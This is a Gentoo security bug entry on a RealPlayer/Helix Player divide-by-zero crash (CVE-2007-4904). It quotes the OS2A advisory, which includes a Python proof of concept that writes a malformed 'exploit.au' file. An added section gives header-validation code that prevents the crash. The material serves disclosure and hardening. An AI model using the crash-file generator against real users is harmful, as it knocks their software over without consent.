| Summary: | media-video/realplayer: .au Divide-By-Zero Denial of Service Vulnerability (CVE-2007-4904) | ||
|---|---|---|---|
| Product: | Gentoo Security | Reporter: | Tobias Heinlein (RETIRED) <keytoaster> |
| Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
| Status: | RESOLVED INVALID | ||
| Severity: | minor | CC: | dyek, media-video |
| Priority: | High | ||
| Version: | unspecified | ||
| Hardware: | All | ||
| OS: | Linux | ||
| URL: | http://www.securityfocus.com/bid/25627 | ||
| Whiteboard: | B3 [upstream+] | ||
| Package list: | Runtime testing required: | --- | |
This is CVE-2007-4904.

Still no news from upstream? :/

I'm told this bug is actually fixed in the nightly snaps.

Helix team decided that this divide-by-zero bug is not a security bug. This bug has already been fixed in the RealPlayer nightly build available here:
http://forms.helixcommunity.org/helix/builds/?category=realplay-current
http://forms.helixcommunity.org/helix/builds/
(Use only the linux-2.2-libc6-gcc32-i586@rhel4 bin or package. AMD64 builds aren't ready for use yet.) The nightly build typically works better than the released RealPlayer. Thanks.

Denial of Service within a user/client application is not considered a security vulnerability. Thanks for getting back to us, Daniel.
RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability

OS2A ID: OS2A_1010
08/21/2007 Issue Discovered
08/31/2007 Vendor Notification
Class: Denial of Service
Severity: High

Overview:
-------------
RealPlayer/Helix Player is a media player that plays popular media formats and organizes music and videos.

Description:
--------------
A Denial of Service flaw exists in RealPlayer and Helix Player when a user opens a malformed .au file. The flaw is a division by zero while processing the malformed AU file. An attacker must entice an unsuspecting user to open a maliciously crafted AU file.

Impact:
--------
Successful exploitation allows an attacker to crash the vulnerable application via a specially crafted file (denial of service).

Affected Software(s):
---------------------
RealPlayer 10.1.0.3114 and prior
Helix Player

Tested on:
- RealPlayer 10.1.0.3114
- RealPlayer 10.0.9
- RealPlayer 10.0.8 on FC6, RH9, RHEL and SuSE respectively
- RealPlayer10-5Gold on Windows XP
- HelixPlayer 1.0.6.778 on FC6

AV MP3 Player and Media Player Classic are also found to be vulnerable.

Affected Platform:
------------------
Microsoft Windows (all platforms)
RedHat Linux
Fedora Core Linux
SuSE Linux

Proof of Concept:
------------------
The following Python program generates a malformed .au file. The bytes are the advisory's original PoC; the program is written for Python 3 (bytes literal, binary file mode). In the 24-byte Sun AU header (magic, header size, data size, encoding, sample rate, channel count, all big-endian) the channel-count field at bytes 20-23 is zero.

```python
import sys

# Sun .au header followed by filler bytes. Bytes 20-23 (channel count) are zero.
head = (b"\x2E\x73\x6E\x64\x00\x00\x01\x18\x02\x01\x42\xDC\x00\x00\x00\x01"
        b"\x02\x02\x1F\x40\x00\x00\x00\x00\x00"
        b"\x31\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        b"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00")

print("[x] RealPlayer/Helix Player/Kaboodle Player DoS")
try:
    f = open("exploit.au", "wb")
except IOError as e:
    print("Unable to open file", e)
    sys.exit(0)
print("[x] File successfully opened for writing.")
try:
    f.write(head)
except IOError as e:
    print("Unable to write to file", e)
    sys.exit(0)
print("[x] File successfully written.")
f.close()
print("[x] Open exploit.au with RealPlayer/Helix/Kaboodle Players.")
# End of program
```

RealPlayer crashes with the following exception (the message is printed by the shell wrapper script that launches the realplay binary):

    Floating point exception $REALPLAYBIN "$@"

CVSS Score Report:
------------------
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT = COMPLETE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 7.1 (AV:N/AC:M/Au:NR/C:N/I:N/A:C)
CVSS Temporal Score = 6.4
Risk factor = High

Reference:
-----------
A similar attack was found recently against Windows Media Player:
http://www.safehack.com/exp/mp/mplayer11.txt

Solution/Work Around:
--------------------
Do not open untrusted .au files.

Credits:
--------
Nagendra Kumar G, Chandan S and Arun Kethipelly of OS2A have been credited with the discovery of this vulnerability.
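The advisory does not say which header field the player divides by, but its PoC header carries a zero in the channel-count field, and a zero channel count (or sample rate) is the classic way an AU parser ends up dividing by zero when it turns a data size into a frame count or duration. The example below is added here and is not code from the advisory, from RealPlayer or from Helix: it parses the fixed AU header, shows the unchecked computation failing on the first 24 bytes of the PoC header, and shows the hardened check that rejects the header before any division. The encoding table and the MAX_CHANNELS / MAX_SAMPLE_RATE bounds are assumptions chosen for the example, and both sample headers are constructed inline.

```python
import struct

# Sun .au fixed header: magic ".snd", header size, data size, encoding,
# sample rate, channel count; all 32-bit big-endian.
AU_MAGIC = b".snd"
AU_HEADER_LEN = 24

# Bytes per sample for the encodings this example accepts (assumption: a subset
# of the Sun AU encoding codes; 1 = 8-bit mu-law, 2/3/4/5 = 8/16/24/32-bit
# linear PCM, 6/7 = 32/64-bit float, 27 = 8-bit A-law).
BYTES_PER_SAMPLE = {1: 1, 2: 1, 3: 2, 4: 3, 5: 4, 6: 4, 7: 8, 27: 1}

# Sanity bounds used by the hardened check (assumptions, not part of the AU spec).
MAX_CHANNELS = 64
MAX_SAMPLE_RATE = 384000

# Constructed input: the first 24 bytes of the advisory's PoC header.
MALFORMED_HEADER = (b".snd"
                    b"\x00\x00\x01\x18"   # header size 280
                    b"\x02\x01\x42\xDC"   # data size
                    b"\x00\x00\x00\x01"   # encoding 1 (mu-law)
                    b"\x02\x02\x1F\x40"   # sample rate (absurd: 33693504)
                    b"\x00\x00\x00\x00")  # channel count = 0

# Constructed input: a well-formed header for 1 second of 8 kHz mono mu-law.
WELL_FORMED_HEADER = AU_MAGIC + struct.pack(">IIIII", 24, 8000, 1, 8000, 1)


def parse_au_header(data):
    """Split the fixed AU header into fields without judging their values."""
    if len(data) < AU_HEADER_LEN:
        raise ValueError("truncated AU header")
    magic, hdr_size, data_size, encoding, rate, channels = struct.unpack(
        ">4sIIIII", data[:AU_HEADER_LEN])
    if magic != AU_MAGIC:
        raise ValueError("not an AU file")
    return {"header_size": hdr_size, "data_size": data_size,
            "encoding": encoding, "sample_rate": rate, "channels": channels}


def duration_unchecked(hdr):
    """Vulnerable pattern: trust the header and divide by a value derived from it.
    A zero channel count or zero sample rate makes the divisor zero."""
    bytes_per_frame = BYTES_PER_SAMPLE.get(hdr["encoding"], 1) * hdr["channels"]
    return hdr["data_size"] / (hdr["sample_rate"] * bytes_per_frame)


def unchecked_divides_by_zero(data):
    """True when the unchecked computation raises ZeroDivisionError for this header."""
    try:
        duration_unchecked(parse_au_header(data))
    except ZeroDivisionError:
        return True
    return False


def validate_au_header(hdr):
    """Hardened check: return the reasons the header must be rejected.
    An empty list means every later divisor is non-zero and plausible."""
    problems = []
    if hdr["header_size"] < AU_HEADER_LEN:
        problems.append("header size %d smaller than the fixed header" % hdr["header_size"])
    if hdr["encoding"] not in BYTES_PER_SAMPLE:
        problems.append("unsupported encoding %d" % hdr["encoding"])
    if not 1 <= hdr["channels"] <= MAX_CHANNELS:
        problems.append("channel count %d out of range" % hdr["channels"])
    if not 1 <= hdr["sample_rate"] <= MAX_SAMPLE_RATE:
        problems.append("sample rate %d out of range" % hdr["sample_rate"])
    return problems


def duration_checked(data):
    """Parse, validate, then compute; raises ValueError instead of dividing by zero."""
    hdr = parse_au_header(data)
    problems = validate_au_header(hdr)
    if problems:
        raise ValueError("rejecting AU header: " + "; ".join(problems))
    return duration_unchecked(hdr)


if __name__ == "__main__":
    for name, blob in (("well-formed", WELL_FORMED_HEADER), ("malformed", MALFORMED_HEADER)):
        print(name, "unchecked divides by zero:", unchecked_divides_by_zero(blob))
        try:
            print(name, "checked duration:", duration_checked(blob))
        except ValueError as e:
            print(name, "checked:", e)
```

The point of the split into parse / validate / compute is that the validation runs once, on the raw header, before any arithmetic that uses the fields as divisors or multipliers; a player that instead checks each field at its first use tends to miss the one path the fuzzed file takes.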